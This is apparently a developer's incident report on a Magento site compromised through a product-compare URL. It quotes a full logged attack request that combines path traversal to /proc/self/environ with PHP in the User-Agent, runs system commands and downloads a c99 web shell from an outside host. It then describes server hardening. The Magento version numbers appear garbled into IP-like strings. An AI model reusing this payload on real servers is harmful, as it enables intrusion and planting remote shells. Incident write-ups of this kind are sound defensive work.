One of our clients recently suffered a RFI hack whilst running version 220.127.116.11 of Magento. Below is my report on what happened (as far as we could tell from server logs), names and places have been changed to protect the identity of the client.
The hacks suffered by the site were a result of external users exploiting certain weaknesses within the Magento code base. These weaknesses allowed hackers to upload and run code directly on the web server in a type of attack known as Remote File Inclusion (RFI).
In this RFI hack the user exploited parts of the code which are vulnerable in version 18.104.22.168 of Magento. One of the hack attempts appeared via the URL used to compare products on the site, this entry being captured in the Apache logs for the domain
22.214.171.124 - - [XX/XX/XXXX:16:32:46 +0100] "GET /catalog/product_compare/add/pr...aGFpbi5odG1sP19fX1NJRD1V//index2.php?option=com_product&controller;=../../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ� HTTP/1.1" 200 2178 "-" "Mozilla/5.0 XHOSTNAME<?php echo system('hostname;echo ;'); ?>XHOSTNAMEXSIP<?php echo $_SERVER['SERVER_ADDR']; ?>XSIPXUNAME<?php echo system('uname -a;echo ;'); ?>XUNAMEXUSERID<?php echo system('id;echo ;'); ?>XUSERIDXPWD<?php echo system('pwd;echo ;'); ?>XPWDXPHP<?php echo phpversion(); ?>XPHPEXPLORE<pre><?php echo system('lwp-download http://tools.quickhw.com/c99.txt;mv c99.txt memek.php; chmod 755 memek.php; ls -al memek.php; echo ; exit;'); ?></pre>EXPLORE"
This example shows the hacker has passed a number of variables as part of the HTTP request after the index.php?, including commands to download the shell file: c99.txt and then rename to memek.php file (using the shell command mv c99.txt memek.php). The memek.php file can now be executed externally within a browser. This exploit in Magento was closed by returning false from the getAddUrl() function in the Magento code base file:
The getAddUrl() function would then read:
public function getAddUrl($product)
#return $this->_getUrl('catalog/product_compare/add', $this->_getUrlParams($product));
# We disable compare functionality by commenting out the real return statement and returning false instead.
In addition to closing potential security risks within Magentoâs code we also added changes at source on the server to prevent hack attempts from gaining access in the first place and restricted the use of some shell commands typically used in RFI attacks. These changes include updating permissions on the wget, curl and lynx commands so only the root user can execute them. To be a root user on the server a hacker would need to know the root user password as well as getting the hacked files uploaded.
Further restrictions were put in place on the server with the use of the PHP plugin mod_security. This allows the server to fully log HTTP requests and responses made to and from the server and monitor these requests to ensure that no malicious attacks can be made; by filtering out particular characters or data before it gets to the web server. What is allowed or denied by the plugin is defined by the its rulesets and these can be as restrictive or open as required. Typically the module will stop attacks in the form of HTML or CSS code being passed via the request URL along with other code requests.
Since implementing the changes detailed above we have not seen any further successfully attacks, although there have been attempts made. This is clearly a very important security flaw with the Magento and/or Zend Framework code that everyone needs to be aware of as hack of these types could prove catastrophic for the client and result in down time or complete loss of service.
If anyone knows if these problems have been fixed in Magento verion 1.4 we would be very grateful for the info.